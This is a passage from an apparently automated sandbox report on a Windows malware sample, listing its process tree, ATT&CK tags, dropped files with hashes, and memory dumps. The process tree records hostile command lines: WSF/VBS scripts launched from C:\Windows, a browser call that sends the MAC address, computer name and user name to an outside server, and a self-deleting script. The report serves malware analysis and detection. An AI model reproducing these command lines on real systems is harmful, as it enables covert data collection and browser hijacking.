    CScript /nologo "c:\windows\pack.wsf" "c:\windows\1_dsckggyoa.bndub"
    3⤵
    PID:952
- C:\Windows\SysWow64\WScript.exe
  "C:\Windows\SysWow64\WScript.exe" "C:\windows\dsckggyoa.bndub"
  2⤵
  - Modifies Internet Explorer settings
  - Modifies Internet Explorer start page
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2012
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://www.5136688.com/?8
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1864
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1864 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1744
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1864 CREDAT:537608 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1368
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://u.5136688.com/setuptj.asp?a_ip=&a_mac=7A:38:97:84:24:14&a_cpname=GRXNNIIE&a_user=me&a_locip=0.0.0.0
  2⤵
  PID:1732
- \??\c:\windows\SysWOW64\wscript.exe
  c:\windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\Killme.vbs
  2⤵
  - Deletes itself
  PID:1104

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\tk.reg

Filesize
2KB

MD5
150de462b0761f45f8895c4d7048e9eb

SHA1
bf7059808c678ef318ecc52f96478d0b781eac4f

SHA256
8b0623895d33749cf53e2b167d8e9ad01e58d82eebaaa83330570ce5305fcc4a

SHA512
2db113bc3b69a3e5cf786232bc7aab3f7139a9f64d09c933849b2ae0bc20f020c9c107ec744855dc85593d9bfe1bc7b8c0952c2a1aa673da351dedaf3fe1b889

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
60KB

MD5
6c6a24456559f305308cb1fb6c5486b3

SHA1
3273ac27d78572f16c3316732b9756ebc22cb6ed

SHA256
efc3c579bd619ceab040c4b8c1b821b2d82c64fddd9e80a00ec0d7f6577ed973

SHA512
587d4a9175a6aa82cd8bb1c11ca6508f95cd218f76ac322ddbd1bc7146a0e25f8937ee426a6fb0fb0bb045cedb24d8c8a9edfe9f654112f293d8701220f726b4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
bdb60104ce72bd0784971f2f45ab98a8

SHA1
aaff9f195c82490fc97b0581645995eada68b8ba

SHA256
20972c6781a8dce10cdf3f2f725612541a780215210f96a233737eeec2f93b4c

SHA512
b6a620f019d9a1931dceb51cfba4c034dc3c71690baa958590fc3d410e4b3c4a4249cf8994e941fb5fb0e66990905d170788c4aca5fa196775bf51551567266f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\lwrmjt1\imagestore.dat

Filesize
5KB

MD5
57ace921cc8763d9c9f24bac605d6e62

SHA1
04985e0f38723fbc1ed28aa660980902054c6c47

SHA256
dc411a97949ec42deb48cb8e027ffd211f74cf9ec9f14b99d77d06dcd5180637

SHA512
4ce90f6e37c0bdf10932636fcc5ee22aad8c0aa7a5f5404fc5ef7c5b351bc2a741dbaffecfb424a3eb56e7ad74c1ebb264d7713dae39e08d17fd549aae215028

Download Submit
C:\Users\Admin\AppData\Local\Temp\Killme.vbs

Filesize
307B

MD5
3247ba64efe12c627dfebf3f329fdea1

SHA1
728b77d4f24bf59bebe6b5d7a1ee152649df99a2

SHA256
afd40258ec3567e97be14cf7bc90fb4d33cffac8f487547697d2f779330faebf

SHA512
3ea327295d306f01f608b3985d8d036ec7c93d985d99eabf549fd2c63713b682d7401fe815c3ab351555870648ce41dddb41129e3ecbc87daa683936aff1372c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\8QSIA1ME.txt

Filesize
580B

MD5
00aae561785200db59f32238d64759f3

SHA1
b9671677d3530164deb458cf0ae30620f7421f92

SHA256
9d7cfe7bc7438fdf02dfbf608b5f98a62f36129fd4234b1bf1b1f5d3baad1bc7

SHA512
6f49335e63b1de366b77a28f273b712c42d1296bf1b37eead6614a6d3b80a44e1eee05f5598b5f5dc0040e8110037fa7c2508409eb229d6db62ad8db9365851b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\F040L0QQ.txt

Filesize
1KB

MD5
a054bbf017f542cd96bf0aee48f94b63

SHA1
ff2589396fa8257e0ee08ccf9719a13ec956e0e1

SHA256
6ed64e5c307df8def83a1d10648011e68e304d47767904c9581324fa211ccb99

SHA512
6a9ee6f2149ae8b05fb421d9c2a25ea082e018390aa7e04881034e222f2602b4effcbfc037fadc10a7658e873bee3344373ed61a3dc693f6249978a94a11d787

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\I24YQK5N.txt

Filesize
812B

MD5
d5e4f14eab3e74d1c7f9f628231b2b32

SHA1
8793b137e1c57dbb1eff3224af38b763faedc07c

SHA256
50b271864ff117b065d8a09cdf42d865081d76471992127f997a2619178ed655

SHA512
c2c2dc007796e42b983f219e9704ba39c8ca5e8a22331880cc1c51782df7311a40621b7ba8cb1dadbaf7316a635301f564e91874cd6e512cc4e10582c401b726

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\IPQUB9P4.txt

Filesize
114B

MD5
f6a369640840ce44dfa5f1cdb9a0d528

SHA1
14d92216af2c41e7869c537d2958f3454f9c0933

SHA256
288d9fb7d76702988fc1bca19781f4fb2c1d4d159ed545a14892d70fa2de6d5d

SHA512
e5aa694cdff7bcecc2ebbd7eb54f42efb71696fbda42366fd43db2e07695e759f3ae3f69eb1ff343c38fa6b7213d064bfd9d8b27dcb96eb62632c98acf70fe16

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\NYTN4D69.txt

Filesize
116B

MD5
ecfa31ea25c696fe06d13e03a0fa5ce4

SHA1
1667452e47bbae27eb7822e954e92637a69531da

SHA256
b90f1d2b933fae100858768ab9f6862c47f122c2305d994e3860c5e70fb59dc5

SHA512
b287205fb13a1d703921575a4a047a04d7464ccff4e2cc0b05887c0b41fdc37cb418c33f8459c0a5f209c8b1a644f069c627c2730c08c565ed2d075503d69fb7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\R9SSEFFT.txt

Filesize
608B

MD5
d06723bf726128ed805f3ced23ef461a

SHA1
3183e8f405ccc8cc392f9f1a9cae157c1a76f7e9

SHA256
6f115836b8c40a3e24b55fd0b37ff61a7c667daad8d62cc654631992b51b4a7a

SHA512
b92b9ffa5a09deb458ae084e3cd2dc1edf8d2d72569304a78d2b0dc3b1df45093e02df536d1f69bcc5a42856f16332d1e1e41805fef145f851ce9f96fb3c3c1f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\U6KMNG99.txt

Filesize
228B

MD5
cbef2a5eb3f37d709bd1db091449bf37

SHA1
afe6684a0048019d3330bb1b447a5c83987d9d25

SHA256
6cc0fc3376afe55522e80a60899f0f482c0d44037f3d1a800fe3adb5941433e5

SHA512
51e0bdee7a530ae6590679d6184fe81e176bebf9faf8bca5e15e3273f9efbcf251188939e3a86fd194f260e35551eb3d383f421ecd37b0b43d2172954e05e5b1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\Y2TU1DZH.txt

Filesize
1KB

MD5
f43e190ee2bbe04d09cea122a02c575b

SHA1
4845c989cd98d0da9d7ce073fc6784fe714e2573

SHA256
f1e4d9a97e06bb9178f4cecf9eeec2c070bcf91f43d6ac455eeb9d94ebdf6ef2

SHA512
866e9b5d334bd159bd60ec136b19ee990188ce67152f65337d79a63123d0725e9641c8152933de427fa6eacf8217fe1e1a99a5017cc6d072540819b60b1bb69f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\ZH98GQLX.txt

Filesize
348B

MD5
6121be51174b6298afe401ff128c9744

SHA1
61a35f6c244c7e2db2eb6a0cb557953d5f26d32f

SHA256
4b842016e0a57726b3b41fb1d8ee88da4308dc231c1a2ab11932b683dd371197

SHA512
af9d5e40bba4b45e78b965260c3f6361c3032f0902462ad1f17380e9fa38d1098bc898a0714d524e32f5a2eb171972f7d754b23186e07fae14b09035cc7db07a

Download Submit
\??\c:\about blank.htm

Filesize
76B

MD5
d5a3771f98d3a1d6dff888f6658c2b09

SHA1
6594a8b8add3e99538490ca905ad96c2b81d6d45

SHA256
0225dc5f53ae12c61851cf204a91494bdeb4812e9954eeab6000a88d3046fcc6

SHA512
9293b9b9371e11369904bf5da03846c832b760c0566d97ecfba0377033895740ce0fafcbb9ad5e20687999cd49f270bf31417a2de9898001bf19d968097d1f63

Download Submit
\??\c:\windows\1_dsckggyoa.bndub

Filesize
47KB

MD5
0141d35349f2107ac9306007ded4783c

SHA1
0458a74a9813265879de013849db4c5a0dcbdd58

SHA256
9b55aea6d88dfb6d6cd0119caee79db24ec4dd296b6c694bf6db9d7b049817d9

SHA512
f417818f712780140485e350abfa89e22dfffa9960ac117a2e3cc4e1af75773b694afa983b3c3d0621161155782cb5be10ab04c4cf41924920d17beaa4751771

Download Submit
\??\c:\windows\dsckggyoa.bndub

Filesize
36KB

MD5
abe75913a90326ff0a368d7eed0520b8

SHA1
99ddd62999c79bf5def956f042c09bf9abf98f9c

SHA256
4d42f1a232634f9ae53cc3d8c23bb59acee2016b998b261d6a7392e4562b9f98

SHA512
2940c063a378ac869c8ff50dfb80f8d75ba8562058678390f4c26808e34cc018447973d398a57ec2fc6ca7f37a78f9a2add9217fee6af2f6182182ba8189a766

Download Submit
\??\c:\windows\pack.wsf

Filesize
8KB

MD5
a83fdf4f29a7e978d33eeb3674df531b

SHA1
60ea7b41816bc2044a6224e38352e56667d3d5ed

SHA256
f85f16fb946e6b4d7ef4f6523276a52b4a68d04bdf340312adc2ccdef4cee845

SHA512
7ad293f3032054c7e55e89a558dde1e4465c31c1c9fd612e3f56fc209b40826af5273fe140273cf467a96dcda805f13844fa6244cbe2e113bfcf131117acdbd0

Download Submit
memory/1244-58-0x0000000076321000-0x0000000076323000-memory.dmp

Filesize
8KB

Download
memory/1960-75-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1960-61-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1960-60-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads